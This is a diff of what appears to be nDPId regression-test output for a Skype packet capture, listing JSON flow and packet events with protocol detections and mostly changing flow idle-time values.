+00603{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2580,"source":"skype.pcap","alias":"nDPId-test","flow_id":248,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1431969715510,"flow_last_seen":1431969745372,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1024,"flow_tot_l4_payload_len":2872,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1431969745372,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"71.238.7.203","src_port":50117,"dst_port":18767,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2593,"source":"skype.pcap","alias":"nDPId-test","flow_id":274,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969745776,"flow_last_seen":1431969745776,"flow_idle_time":180000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1431969745776,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"239.255.255.250","src_port":56886,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00622{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2593,"source":"skype.pcap","alias":"nDPId-test","flow_id":274,"flow_packet_id":1,"flow_last_seen":1431969745776,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"thread_ts_msec":1431969745776,"pkt":"AQBef\/\/6PBXCt3IOCABFAACh3hQAAAERKXPAqAEi7\/\/\/+t42B2wAjVUWTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KTVg6IDINCkhPU1Q6IDIzOS4yNTUuMjU1LjI1MDoxOTAwDQpNQU46ICJzc2RwOmRpc2NvdmVyIg0KU1Q6IHVybjpzY2hlbWFzLXVwbnAtb3JnOnNlcnZpY2U6V0FOUFBQQ29ubmVjdGlvbjoxDQoNCg=="} 00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2593,"source":"skype.pcap","alias":"nDPId-test","flow_id":274,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969745776,"flow_last_seen":1431969745776,"flow_idle_time":180000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1431969745776,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"239.255.255.250","src_port":56886,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 
@@ -1014,10 +1014,10 @@ 00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2597,"source":"skype.pcap","alias":"nDPId-test","flow_id":276,"flow_packet_id":1,"flow_last_seen":1431969745776,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1431969745776,"pkt":"0NQSxnP1PBXCt3IOCABFAAAoljUAAEARYRzAqAEiwKgBAcFnFOcAFDI4AAEAADLdMt0AAA4Q"} 00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2605,"source":"skype.pcap","alias":"nDPId-test","flow_id":276,"flow_packet_id":2,"flow_last_seen":1431969746031,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1431969746031,"pkt":"0NQSxnP1PBXCt3IOCABFAAAoS5QAAEARq73AqAEiwKgBAcFnFOcAFDI4AAEAADLdMt0AAA4Q"} 00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2621,"source":"skype.pcap","alias":"nDPId-test","flow_id":276,"flow_packet_id":3,"flow_last_seen":1431969746545,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1431969746545,"pkt":"0NQSxnP1PBXCt3IOCABFAAAo\/FMAAEAR+v3AqAEiwKgBAcFnFOcAFDI4AAEAADLdMt0AAA4Q"} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2649,"source":"skype.pcap","alias":"nDPId-test","flow_id":277,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969750597,"flow_last_seen":1431969750597,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969750597,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.53.47","src_port":50134,"dst_port":12350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2649,"source":"skype.pcap","alias":"nDPId-test","flow_id":277,"flow_packet_id":1,"flow_last_seen":1431969750597,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969750597,"pkt":"0NQSxnP1PBXCt3IOCABFAABAYx1AAEAGQ2nAqAEinTg1L8PWMD5iE\/TfAAAAALAC\/\/\/p7gAAAgQFtAEDAwUBAQgKPiQvsAAAAAAEAgAA"} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2651,"source":"skype.pcap","alias":"nDPId-test","flow_id":277,"flow_packet_id":2,"flow_last_seen":1431969750865,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969750865,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADMGs4qdODUvwKgBIjA+w9azhlZQYhP04KASOJDCuQAAAgQFrAQCCApiCpO7PiQvsAEDAwk="} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2652,"source":"skype.pcap","alias":"nDPId-test","flow_id":277,"flow_packet_id":3,"flow_last_seen":1431969750865,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969750865,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0wMFAAEAG5dDAqAEinTg1L8PWMD5iE\/Tgs4ZWUYAQECwY2QAAAQEICj4kMLtiCpO7"} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2649,"source":"skype.pcap","alias":"nDPId-test","flow_id":277,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969750597,"flow_last_seen":1431969750597,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969750597,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.53.47","src_port":50134,"dst_port":12350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2649,"source":"skype.pcap","alias":"nDPId-test","flow_id":277,"flow_packet_id":1,"flow_last_seen":1431969750597,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969750597,"pkt":"0NQSxnP1PBXCt3IOCABFAABAYx1AAEAGQ2nAqAEinTg1L8PWMD5iE\/TfAAAAALAC\/\/\/p7gAAAgQFtAEDAwUBAQgKPiQvsAAAAAAEAgAA"} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2651,"source":"skype.pcap","alias":"nDPId-test","flow_id":277,"flow_packet_id":2,"flow_last_seen":1431969750865,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969750865,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADMGs4qdODUvwKgBIjA+w9azhlZQYhP04KASOJDCuQAAAgQFrAQCCApiCpO7PiQvsAEDAwk="} 
+00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2652,"source":"skype.pcap","alias":"nDPId-test","flow_id":277,"flow_packet_id":3,"flow_last_seen":1431969750865,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969750865,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0wMFAAEAG5dDAqAEinTg1L8PWMD5iE\/Tgs4ZWUYAQECwY2QAAAQEICj4kMLtiCpO7"} 00540{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2660,"source":"skype.pcap","alias":"nDPId-test","flow_id":278,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969751302,"flow_last_seen":1431969751302,"flow_idle_time":600000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":12,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1431969751302,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"224.0.0.1","l4_proto":2,"flow_datalink":1,"flow_max_packets":3} 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2660,"source":"skype.pcap","alias":"nDPId-test","flow_id":278,"flow_packet_id":1,"flow_last_seen":1431969751302,"flow_idle_time":600000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":60,"pkt_l4_len":12,"thread_ts_msec":1431969751302,"pkt":"AQBeAAAB0NQSxnP1CABGwAAkAABAAAECQmnAqAEB4AAAAZQEAAARZOweAAAAAAJ9AAAAAAAAAAAAAAAA"} 00599{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2660,"source":"skype.pcap","alias":"nDPId-test","flow_id":278,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969751302,"flow_last_seen":1431969751302,"flow_idle_time":600000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":12,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1431969751302,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"224.0.0.1","l4_proto":2,"ndpi": 
{"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} 
@@ -1025,126 +1025,114 @@ 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2761,"source":"skype.pcap","alias":"nDPId-test","flow_id":279,"flow_packet_id":1,"flow_last_seen":1431969759543,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":1431969759543,"pkt":"0NQSxnP1PBXCt3IOCABFwABMl\/4AAEAR3SbAqAEiEf0w9QB7AHsAOFSa4wIG7AAAChwAAPSnEf0w9dkEndkb+ycx2QSd2Rb0\/7nZBJ3ZG\/snMdkEnl+LA3WC"} 00674{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2761,"source":"skype.pcap","alias":"nDPId-test","flow_id":279,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969759543,"flow_last_seen":1431969759543,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1431969759543,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"17.253.48.245","src_port":123,"dst_port":123,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NTP","breed":"Acceptable","category":"System"},"ntp": {"request_code":0,"version":0}} 00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2763,"source":"skype.pcap","alias":"nDPId-test","flow_id":279,"flow_packet_id":2,"flow_last_seen":1431969759588,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":1431969759588,"pkt":"PBXCt3IO0NQSxnP1CABFAABMAABAADgRPeUR\/TD1wKgBIgB7AHsAOA1EJAEG7AAAAAAAAAAMR1BTc9kEnl2e8n962QSeX4sDdYLZBJ5fkbdSxdkEnl+RubQR"} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2921,"source":"skype.pcap","alias":"nDPId-test","flow_id":280,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969770694,"flow_last_seen":1431969770694,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969770694,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"76.167.161.6","src_port":50135,"dst_port":20274,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2921,"source":"skype.pcap","alias":"nDPId-test","flow_id":280,"flow_packet_id":1,"flow_last_seen":1431969770694,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969770694,"pkt":"0NQSxnP1PBXCt3IOCABFAABArS9AAEAG3hDAqAEiTKehBsPXTzInl3a\/AAAAALAC\/\/8aLgAAAgQFtAEDAwUBAQgKPiR90gAAAAAEAgAA"} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2922,"source":"skype.pcap","alias":"nDPId-test","flow_id":281,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969770694,"flow_last_seen":1431969770694,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969770694,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"71.238.7.203","src_port":50136,"dst_port":18767,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2922,"source":"skype.pcap","alias":"nDPId-test","flow_id":281,"flow_packet_id":1,"flow_last_seen":1431969770694,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969770694,"pkt":"0NQSxnP1PBXCt3IOCABFAABALoZAAEAG+q7AqAEiR+4Hy8PYSU+K+FHXAAAAALAC\/\/9\/iwAAAgQFtAEDAwUBAQgKPiR90gAAAAAEAgAA"} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2923,"source":"skype.pcap","alias":"nDPId-test","flow_id":282,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969770694,"flow_last_seen":1431969770694,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969770694,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"5.248.186.221","src_port":50137,"dst_port":31010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2923,"source":"skype.pcap","alias":"nDPId-test","flow_id":282,"flow_packet_id":1,"flow_last_seen":1431969770694,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969770694,"pkt":"0NQSxnP1PBXCt3IOCABFAABAQGxAAEAGd6zAqAEiBfi63cPZeSJOVOkRAAAAALAC\/\/+EAwAAAgQFtAEDAwUBAQgKPiR90wAAAAAEAgAA"} 
-00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2924,"source":"skype.pcap","alias":"nDPId-test","flow_id":282,"flow_packet_id":2,"flow_last_seen":1431969770813,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969770813,"pkt":"PBXCt3IO0NQSxnP1CABFAABA2Z5AAHIGrHkF+LrdwKgBInkiw9nUmdR+TlTpErASRBBRzQAAAgQFrAEDAwABAQgKAAAAAAAAAAABAQQC"} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2925,"source":"skype.pcap","alias":"nDPId-test","flow_id":282,"flow_packet_id":3,"flow_last_seen":1431969770814,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969770814,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0mqxAAEAGHXjAqAEiBfi63cPZeSJOVOkS1JnUf4AQECwKBgAAAQEICj4kfkoAAAAA"} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2928,"source":"skype.pcap","alias":"nDPId-test","flow_id":281,"flow_packet_id":2,"flow_last_seen":1431969770913,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969770913,"pkt":"PBXCt3IO0NQSxnP1CABFAABAAItAAHMG9alH7gfLwKgBIklPw9gmoqm+ivhR2LAS\/\/9qHAAAAgQFrAEDAwABAQgKAAAAAAAAAAABAQQC"} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2929,"source":"skype.pcap","alias":"nDPId-test","flow_id":281,"flow_packet_id":3,"flow_last_seen":1431969770913,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969770913,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0fUhAAEAGq\/jAqAEiR+4Hy8PYSU+K+FHYJqKpv4AQECzd4gAAAQEICj4kfqwAAAAA"} 
-00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2934,"source":"skype.pcap","alias":"nDPId-test","flow_id":280,"flow_packet_id":2,"flow_last_seen":1431969770978,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969770978,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAAC4GnURMp6EGwKgBIk8yw9eajaZMJ5d2wKAScSAAYwAAAgQFrAQCCAq+obooPiR90gEDAwc="} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2935,"source":"skype.pcap","alias":"nDPId-test","flow_id":280,"flow_packet_id":3,"flow_last_seen":1431969770978,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969770978,"pkt":"0NQSxnP1PBXCt3IOCABFAAA05SBAAEAGpivAqAEiTKehBsPXTzInl3bAmo2mTYAQECyPAQAAAQEICj4kfuy+oboo"} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2951,"source":"skype.pcap","alias":"nDPId-test","flow_id":283,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969771806,"flow_last_seen":1431969771806,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969771806,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"71.238.7.203","src_port":50138,"dst_port":18767,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2951,"source":"skype.pcap","alias":"nDPId-test","flow_id":283,"flow_packet_id":1,"flow_last_seen":1431969771806,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969771806,"pkt":"0NQSxnP1PBXCt3IOCABFAABAXBhAAEAGzRzAqAEiR+4Hy8PaSU8uFQxlAAAAALAC\/\/8djQAAAgQFtAEDAwUBAQgKPiSCJAAAAAAEAgAA"} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2952,"source":"skype.pcap","alias":"nDPId-test","flow_id":284,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969771806,"flow_last_seen":1431969771806,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969771806,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"5.248.186.221","src_port":50139,"dst_port":31010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2952,"source":"skype.pcap","alias":"nDPId-test","flow_id":284,"flow_packet_id":1,"flow_last_seen":1431969771806,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969771806,"pkt":"0NQSxnP1PBXCt3IOCABFAABAZhxAAEAGUfzAqAEiBfi63cPbeSJooXaIAAAAALAC\/\/\/X7AAAAgQFtAEDAwUBAQgKPiSCJAAAAAAEAgAA"} 
-00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2953,"source":"skype.pcap","alias":"nDPId-test","flow_id":284,"flow_packet_id":2,"flow_last_seen":1431969771918,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969771918,"pkt":"PBXCt3IO0NQSxnP1CABFAABA2bNAAHIGrGQF+LrdwKgBInkiw9s0p7etaKF2ibASRBBmywAAAgQFrAEDAwABAQgKAAAAAAAAAAABAQQC"} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2954,"source":"skype.pcap","alias":"nDPId-test","flow_id":284,"flow_packet_id":3,"flow_last_seen":1431969771919,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969771919,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0HKZAAEAGm37AqAEiBfi63cPbeSJooXaJNKe3roAQECwaugAAAQEICj4kgpQAAAAA"} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2956,"source":"skype.pcap","alias":"nDPId-test","flow_id":283,"flow_packet_id":2,"flow_last_seen":1431969772021,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969772021,"pkt":"PBXCt3IO0NQSxnP1CABFAABAALFAAHMG9YNH7gfLwKgBIklPw9pIXx9TLhUMZrAS\/\/91HgAAAgQFrAEDAwABAQgKAAAAAAAAAAABAQQC"} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2957,"source":"skype.pcap","alias":"nDPId-test","flow_id":283,"flow_packet_id":3,"flow_last_seen":1431969772021,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969772021,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0TOFAAEAG3F\/AqAEiR+4Hy8PaSU8uFQxmSF8fVIAQECzklgAAAQEICj4kgvoAAAAA"} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3013,"source":"skype.pcap","alias":"nDPId-test","flow_id":285,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969774806,"flow_last_seen":1431969774806,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969774806,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"76.167.161.6","src_port":50140,"dst_port":20274,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3013,"source":"skype.pcap","alias":"nDPId-test","flow_id":285,"flow_packet_id":1,"flow_last_seen":1431969774806,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969774806,"pkt":"0NQSxnP1PBXCt3IOCABFAABAwnFAAEAGyM7AqAEiTKehBsPcTzIA95PqAAAAALAC\/\/8TqQAAAgQFtAEDAwUBAQgKPiSNxwAAAAAEAgAA"} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3061,"source":"skype.pcap","alias":"nDPId-test","flow_id":285,"flow_packet_id":2,"flow_last_seen":1431969776480,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969776480,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAAC4GnURMp6EGwKgBIk8yw9wNTHkCAPeT66AScSCe6QAAAgQFrAQCCAq+oc+oPiSNxwEDAwc="} 
-00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3062,"source":"skype.pcap","alias":"nDPId-test","flow_id":285,"flow_packet_id":3,"flow_last_seen":1431969776480,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1431969776480,"pkt":"0NQSxnP1PBXCt3IOCABFAAAo01NAAEAGuATAqAEiTKehBsPcTzIA95PrAAAAAFAEAABYdwAA"} -00638{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3090,"source":"skype.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969643944,"flow_last_seen":1431969668477,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":313,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1431969781311,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.33","src_port":50030,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3090,"source":"skype.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969643944,"flow_last_seen":1431969668477,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":313,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1431969781311,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.33","src_port":50030,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
